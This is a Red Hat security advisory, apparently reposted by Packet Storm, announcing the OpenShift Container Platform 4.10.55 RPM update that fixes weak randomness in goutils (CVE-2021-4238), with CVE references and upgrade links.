fe0Xm1uDSIQA3ov7x6NTrjgC4qccQsJWO/z1Lnnh3vJw3Rl/Qb7cOTSXTzLIS+6V  
FnCz+L+vzcI=0kY7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1392-01

Red Hat Security Advisory 2023-1393-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.55.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.10.55 security update  
Advisory ID:       RHSA-2023:1393-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1393  
Issue date:        2023-03-29  
CVE Names:         CVE-2021-4238 CVE-2022-3564 CVE-2022-4269  
                   CVE-2022-4378  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.10.55 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.55 See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:1392

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

5. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCOtStzjgjWX9erEAQjbvw//X0a/bbRgH8Dl//LJvsD3x9k4XLfBqlHS  
BHFfU98nTxNBknbqEKQtne4SeUXVRK3U0ZFwpYUumJuvqkfvcGt2pyf92jvdVtLJ  
MD5gf3scBgZ4y/6uIJEDfB/1xCTR+ReHaxX7FNwLmi8mCabY94KFV0UMPmQ+9AaK  
XE4sBS3aLe+FeYssD2OknGiNv5jq9W5bWLSLx/zaiN84Ec76vQ3gJzR5nRA4HlzH  
eZTYcPzsF8MUikuR2PdRJdwWB/057mQrqkI8xG+X9WEKPbipYLyxKAOT1mM1HXmW  
z2RHowb5UBNEGoMT0OlF+XDuPoFzu+suXnup+kbKnpvgK/6naZwHtSaLt+rKwkp3  
ZCEso+bSG/FZ4vQ67ZSmTnFVJG+swsqll5whfWNGGgNFYRO+AQgW9FHahAh4oIip  
/xS3DpP7zMFJw8tnnTwz04HJc/Ey7sdjyETKrBrnmXmHh5JoNcgmYHqvIgiTlCAB  
0eEtMW7c0yl/HY7qQxL7ttaXoPhY8WYalRNu9X6IOy5v1dSc75/7O9q8vJxL2I1N  
P+FJkhf7AyOZhtb9bXcizFdHX7nGB4kjWKWvFnrghnrNSvboscQ12TH2mo1GBnqL  
L5iSb1NYRVcC++I3TxdDuVU4j7oJcdNXpGYJrMqaOvjeiylIxe4axTUBRfaRSFbU  
dw+aJVm7jgUÝ5f  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm